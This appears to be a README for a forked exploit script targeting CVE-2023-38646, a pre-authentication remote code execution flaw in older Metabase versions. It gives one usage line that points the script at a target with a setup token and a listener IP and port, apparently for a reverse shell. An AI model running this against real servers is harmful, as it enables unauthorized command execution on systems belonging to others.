Fork of kh4sh3i's removing the need for Burp Collector.
CVE-2023-38646 (Pre-Auth RCE in Metabase):
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation.
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
For more info read this post.